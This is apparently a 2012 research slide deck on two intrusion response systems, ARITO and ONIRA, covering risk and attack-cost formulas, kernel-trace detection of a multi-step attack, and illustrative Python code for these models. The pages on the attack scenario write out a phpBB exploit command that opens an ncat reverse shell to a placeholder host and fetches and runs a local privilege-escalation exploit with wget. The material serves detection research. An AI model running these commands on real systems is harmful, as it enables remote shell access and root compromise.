System Health Monitoring and Proactive Response Activation Alireza Shameli-Sendi Michel Dagenais December 6, 2012 École Polytechnique, Montreal
Page 1: System Health Monitoring and Proactive Response Activation fileSystem Health Monitoring and Proactive Response Activation Alireza Shameli-Sendi Michel Dagenais December 6, 2012 École

System Health Monitoring and Proactive Response Activation

Alireza Shameli-Sendi

Michel Dagenais

December 6, 2012École Polytechnique, Montreal

Page 2

Content

Two Frameworks for IRS:

– ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance

– ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Graph

Page 3

Achievement

Eclipse Framework:

– Prediction Algorithm

– Risk Assessment Algorithm

– Response System

• ORCEF – Static Risk Assessment

• ARITO – Improves ORCEF by adding online risk assessment

– No relationship between services is modelled

• ONIRA – Improves ARITO by considering attack impact propagation in the service dependency graph

[Timeline figure, 2010 to 2012: Prediction, ORCEF, ARITO, ONIRA, with columns Risk Assessment and Response System and arrows labelled "Improves".]

Page 4

ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance

Page 5

ARITO Features

ARITO is an Intrusion Response System consisting of:

– Risk Assessment module

– Response Activation module

– Response Deactivation module

– Response Coordinator module, which measures the response goodness

Page 6

Response System in ARITO

– Concept: Activation, Deactivation

– Category: Instantaneous, Sustained reversible, Sustained irreversible

– Attribute: Start time, Life time

Page 7

How ARITO works

Scenario: [figure of the risk impact over time against the threshold]

$RI_c = RI_p + RI_n$

– Under the threshold and before the response is applied

– Above the threshold: the response coordinator selects an instantaneous response first

– Under the threshold and after the responses have been applied: the risk is initialized to a level below the threshold ($\varphi$)

Page 8

Response Goodness

$\varphi$ is dynamic, and is based on how successful the response was in repelling the attack

The best response goodness is 2, reached when we have success values not only in the current window but also in all previous windows

Scenario: [figure of the risk level reset to $\varphi$ after the responses]

$\varphi = T_a - \dfrac{T_a}{2} - \dfrac{RG}{G_{max} - G_{min}} \cdot T_a$

$Goodness_{w_k} = \dfrac{\sum_{i=1}^{n} S_i - \sum_{j=1}^{m} F_j}{\sum_{i=1}^{n} S_i + \sum_{j=1}^{m} F_j}$

$RG = \sum_{k=1}^{n} \dfrac{Goodness_{w_k}}{2^{k-1}}, \quad -2 < RG < +2$

Best $RG = 1 + \frac{1}{2} + \frac{1}{4} + \frac{1}{8} + \dots \simeq 2$
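The goodness, RG and $\varphi$ formulas of this slide, together with the $RI_c = RI_p + RI_n$ accumulation of the previous slide, carried through on a constructed window history. This is an added example, not the authors' ARITO code; treating an empty window as neutral, $G_{max} = 2$, $G_{min} = -2$, and the way the two slides' rules are combined in `risk_after_responses` are assumptions.

```python
from typing import Sequence

G_MAX, G_MIN = 2.0, -2.0  # bounds of RG given on the slide: -2 < RG < +2


def window_goodness(successes: Sequence[float], failures: Sequence[float]) -> float:
    """Goodness of one window: (sum S_i - sum F_j) / (sum S_i + sum F_j), in [-1, 1].
    A window with no observations is treated as neutral (0): an assumption of this example."""
    s, f = sum(successes), sum(failures)
    return 0.0 if s + f == 0 else (s - f) / (s + f)


def response_goodness(windows: Sequence[float]) -> float:
    """RG = sum_k Goodness_{w_k} / 2^(k-1); windows[0] is the current window, older ones follow.
    Halving weights keep RG in (-2, 2); an all-success history gives 1 + 1/2 + 1/4 + ... ~ 2."""
    return sum(g / 2 ** k for k, g in enumerate(windows))


def new_risk_level(t_a: float, rg: float) -> float:
    """phi = T_a - T_a/2 - RG / (G_max - G_min) * T_a, the level the risk is reset to after
    the responses: RG near 2 resets it to ~0, RG near -2 leaves it at the threshold T_a."""
    return t_a - t_a / 2 - rg / (G_MAX - G_MIN) * t_a


def risk_after_responses(ri_p: float, ri_n: float, t_a: float, windows: Sequence[float]) -> float:
    """RI_c = RI_p + RI_n; once RI_c crosses T_a the responses fire and the risk is
    re-initialised to phi, otherwise the accumulated risk is kept (assumed combination)."""
    ri_c = ri_p + ri_n
    return new_risk_level(t_a, response_goodness(windows)) if ri_c > t_a else ri_c


# Constructed history: current window fully successful, previous mixed, oldest all failures
HISTORY = [
    window_goodness([1, 1, 1], []),  # 1.0
    window_goodness([1], [1]),       # 0.0
    window_goodness([], [1, 1]),     # -1.0
]

if __name__ == "__main__":
    rg = response_goodness(HISTORY)
    print(f"RG = {rg:.3f}, new level = {new_risk_level(100.0, rg):.2f}")
```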

Page 9

Attack Scenario

The steps have been grouped into five phases:

– Probing

– Exploit phpBB2

– Upload exploit

– Exploit Linux kernel 2.6.37 to obtain root

– Install a permanent access

Page 10

Abstracted Trace of Attack Scenario and Detection of Each Step

[Figure: the trace with the alert raised at each detected step, A to K.]

A: web application scan
B: apache executes shell
C: shell executes ncat
D: ncat connects to remote host
E: ncat executes shell
F: shell executes wget
G: shell executes cc
H: shell executes exploit
M: exploit executes shell
N: shell executes adduser
K: shell is root

Page 11

Results

Risk Impact Tolerance

[Figure: risk impact over time with rows Command (C1 to C3), Alert (A to K, as in the legend on page 10) and Response (R1 to R6); a response is activated when $RI_c > T_a$, after which the risk is set to the new level $\varphi$.]

Commands:

C1: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"
C2: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "wget x.x.x.x/LPE.c -O /tmp/LPE.c"
C3: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "/tmp/LPE"

Responses:

R1: CLOSE_A_NET_CONNECTION
R2: KILL_PROCESS
R3: RESTART_DAEMON
R4: RESET(machine)
R5: NOT_ALLOWED_HOST(attacker IP)
R6: R_BLOCK_RECEIVER_PORT

Page 12

ARITO Performance in Real-Time

The reaction delay time:

$reaction\_delay_i = \Delta t_{detection_i} + t_{risk_i} + t_{decision_i} + t_{response_i}$

$\Delta t_{detection_i} = t_{d_i} - t_i$

– $\Delta t_{detection}$ takes between 50 ms and 100 ms

– Risk assessment takes less than 6 ms

– The decision is made in less than 5 ms, so for R1 = R_CLOSE_A_NET_CONNECTION, reaction_delay(2) takes 81 ms

– The framework is fast enough to stop the attack in real-time

$reaction\_delay_i \simeq t_{response_i}$

Page 13

Conclusion (ARITO)

ARITO proposes a perfect coordination between the risk assessment mechanism and the response system, which leads to an efficient framework that is able to:

– Prevent unnecessary responses

– Perform response activation and deactivation

– Consider the user's needs in terms of QoS

Page 14

ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Graph

Page 15

ONIRA Features

– Presents multi-step attack detection from LTTng traces using an attack graph

– Dynamic attack cost calculation based on the attack graph and the service dependency graph

– In the service dependency graph, the calculation is based on impact propagation

Page 16

Attack Modeling

The LAMBDA language* is used for each state

Some attributes have been added to the LAMBDA language:

– Knowledge level

– CIA effects

* LAMBDA: A Language to Model a Database for Detection of Attacks

Page 17

Service Dependency Graph Modeling

For each service S three properties are defined: C(S), I(S), and A(S)

Two edges are available between every two services:

– Forward edge loss

– Backward edge loss

• Mandatory type dependency

– Not able to continue working

– Impact on Confidentiality

– Impact on Integrity

$Impact(S_i) = DirectImpact(S_i) + ForwardImpact(S_i) + BackwardImpact(S_i)$

Page 18

Attack Cost Model

Parameters:

– Knowledge Level ($\kappa$)

– Attack frequency ($\theta$)

– Effect on CIA ($\Delta_{max}$)

– Service value ($\xi$)

[Figure: attack graph with State1 to State4, linked to the service dependency graph.]

Page 19

Attack Cost Model

Attack Cost:

$\Psi = \alpha \times \kappa + \beta \times \theta + \gamma \times \xi + \delta \times \Delta_{max}$

Knowledge Level:

$\kappa = \dfrac{\text{the number of skipped states}}{\text{the number of knowledge states}}$

Effect on CIA:

$\Delta C_{max} = \max x.ConfidentialityLoss$

$\Delta I_{max} = \max x.IntegrityLoss$

$\Delta A_{max} = \max x.AvailabilityLoss$

$\forall x \in$ executed steps in the attack graph

$\Delta_{max} = \dfrac{\Delta C_{max} + \Delta I_{max} + \Delta A_{max}}{3}$

Ranges: $\kappa \in [0, 1]$, $\theta \in [0, \infty]$, $\Delta_{max} \in [0, 1]$, $\xi \in [0, 1]$
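The attack cost model of this slide ($\Psi$, $\kappa$ and $\Delta_{max}$) evaluated on a constructed run of the attack graph from the results slides, in which probing, wget and cc are skipped. This is an added example, not the authors' ONIRA code; which states count as knowledge states, the per-state CIA losses, the equal weights $\alpha = \beta = \gamma = \delta = 0.25$ and the values of $\theta$ and $\xi$ are assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Step:
    """One attack-graph state: name, whether it is a knowledge state (KL = Yes on the
    figure), whether the trace matched it in this run, and its CIA losses in [0, 1]."""
    name: str
    knowledge: bool
    executed: bool
    c_loss: float = 0.0
    i_loss: float = 0.0
    a_loss: float = 0.0


def knowledge_level(steps: list[Step]) -> float:
    """kappa = number of skipped knowledge states / number of knowledge states, in [0, 1]."""
    knowledge = [s for s in steps if s.knowledge]
    if not knowledge:
        return 0.0
    return sum(1 for s in knowledge if not s.executed) / len(knowledge)


def cia_effect(steps: list[Step]) -> float:
    """Delta_max = (Delta C_max + Delta I_max + Delta A_max) / 3, maxima over executed steps."""
    done = [s for s in steps if s.executed]
    if not done:
        return 0.0
    return (max(s.c_loss for s in done) + max(s.i_loss for s in done)
            + max(s.a_loss for s in done)) / 3


def attack_cost(steps: list[Step], theta: float, xi: float, alpha: float = 0.25,
                beta: float = 0.25, gamma: float = 0.25, delta: float = 0.25) -> float:
    """Psi = alpha*kappa + beta*theta + gamma*xi + delta*Delta_max; theta is the attack
    frequency (>= 0), xi the service value in [0, 1]; equal weights are assumed here."""
    return (alpha * knowledge_level(steps) + beta * theta
            + gamma * xi + delta * cia_effect(steps))


# Constructed run of scenario 2 at t2 (probing, wget and cc skipped); knowledge flags
# and loss values are assumptions of this example, not from the slides.
SCENARIO_2_T2 = [
    Step("probing", knowledge=True, executed=False, c_loss=0.2),
    Step("ncat", knowledge=False, executed=True, c_loss=0.5, i_loss=0.3),
    Step("wget", knowledge=True, executed=False, i_loss=0.4),
    Step("cc", knowledge=True, executed=False),
    Step("exploit", knowledge=False, executed=True, c_loss=0.9, i_loss=0.9, a_loss=0.6),
    Step("adduser", knowledge=False, executed=True, i_loss=1.0),
]
```

With every knowledge state skipped, $\kappa = 1$ and the cost rises even though fewer steps ran, which is the point of the knowledge-level term.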

Page 20

ONIRA Architecture

Page 21

Result (Attack Modeling)

[Attack-graph figure: Start → Probing → ncat → wget → cc → exploit → AddUser → End, each state annotated with its knowledge level (KL = Yes or KL = No), plus a Response node.]

Trace events matched for the ncat state:

fs.exec: 18322, 18322, /bin/sh, , 12830, 0x0, SYSCALL { filename = "/bin/sh" }

fs.exec: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { filename = "/usr/bin/ncat" }

net.socket_connect: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { fd = 3, uservaddr = 0x80640a0, addrlen = 16, ret = -115 }

./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"
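A small pattern matcher over the three kernel trace lines shown above, raising the "shell executes ncat" and "ncat connects to remote host" alerts (C and D in the legend on page 10) from process ancestry. This is an added example, not ONIRA's LTTng-based matcher; the field layout (event, pid, tid, process name, unused, parent pid, unused, payload) is an assumption about the trace format.

```python
import re

# Trace lines copied from the slide, used here as constructed sample input; the field
# layout (event, pid, tid, name, unused, ppid, unused, SYSCALL payload) is assumed.
TRACE = """fs.exec: 18322, 18322, /bin/sh, , 12830, 0x0, SYSCALL { filename = "/bin/sh" }
fs.exec: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { filename = "/usr/bin/ncat" }
net.socket_connect: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { fd = 3, uservaddr = 0x80640a0, addrlen = 16, ret = -115 }"""

LINE = re.compile(
    r"^(?P<event>[\w.]+): (?P<pid>\d+), (?P<tid>\d+), (?P<name>[^,]*), [^,]*, "
    r"(?P<ppid>\d+), [^,]*, SYSCALL \{ (?P<payload>.*) \}$"
)


def parse(text: str) -> list[dict]:
    """Turn trace lines into dicts; lines that do not match the assumed layout are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            e = m.groupdict()
            e["pid"], e["ppid"] = int(e["pid"]), int(e["ppid"])
            events.append(e)
    return events


def match_attack_steps(events: list[dict]) -> list[str]:
    """Return the alerts raised, in order: C when ncat is exec'd by a pid that itself exec'd
    a shell, D when that ncat pid issues socket_connect (ret = -115 is EINPROGRESS, a
    non-blocking connect still in flight, so it counts as a connection attempt)."""
    shells, ncats, alerts = set(), set(), []
    for e in events:
        if e["event"] == "fs.exec":
            exe = re.search(r'filename = "([^"]+)"', e["payload"]).group(1)
            if exe.endswith("/sh"):
                shells.add(e["pid"])
            elif exe.endswith("/ncat") and e["ppid"] in shells:
                ncats.add(e["pid"])
                alerts.append("C")
        elif e["event"] == "net.socket_connect" and e["pid"] in ncats:
            alerts.append("D")
    return alerts


if __name__ == "__main__":
    print(match_attack_steps(parse(TRACE)))  # ['C', 'D']
```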

Page 22

Result (Attack Modeling)

[Same attack-graph figure as on page 21, with the knowledge-level annotations.]

> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "wget x.x.x.x/LPE.c -O /tmp/LPE.c"

> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"

> wget x.x.x.x/LPE.c

Page 23

Result (Framework)

ONIRA Framework in Eclipse

Page 24

Results

Scenario 1: The intruder runs all steps of the multi-step attack, even the second time

Scenario 2:

– t1: all steps

– t2: skips three states: probing, wget, and cc

Scenario 3:

– t1: skips two states: probing and cc

– t2: skips three states: probing, upload, and cc

– t3: runs all steps

Page 25

ONIRA Performance in Real-Time

– The total cost of generating trace events, reading events, and pattern matching is about 60 ms for this multi-step attack scenario

– For this trace, generated at a rate of 385 KB/s, storing the state information in the SHD takes 70 ms

– Retrieving information from the SHD takes 60 ms

– Checking the preconditions of five states takes 200 ms

– The risk assessment component takes less than 10 ms

– The decision is made in less than 3 ms

– In the worst case, the ONIRA framework takes 343 ms

Page 26

Conclusion (ONIRA)

– ONIRA proposes a framework to calculate the attack cost with a dynamic attack graph in live mode, based on kernel-level events

– ONIRA uses the service dependency graph to compute the damage cost based on three concepts: direct impact, forward impact, and backward impact

– ONIRA calculates an accurate attack cost based on the information provided by the service dependency and attack graphs

Page 27

System Health Monitoring and Proactive Response Activation

www.lttng.org

Thank You

DORSAL
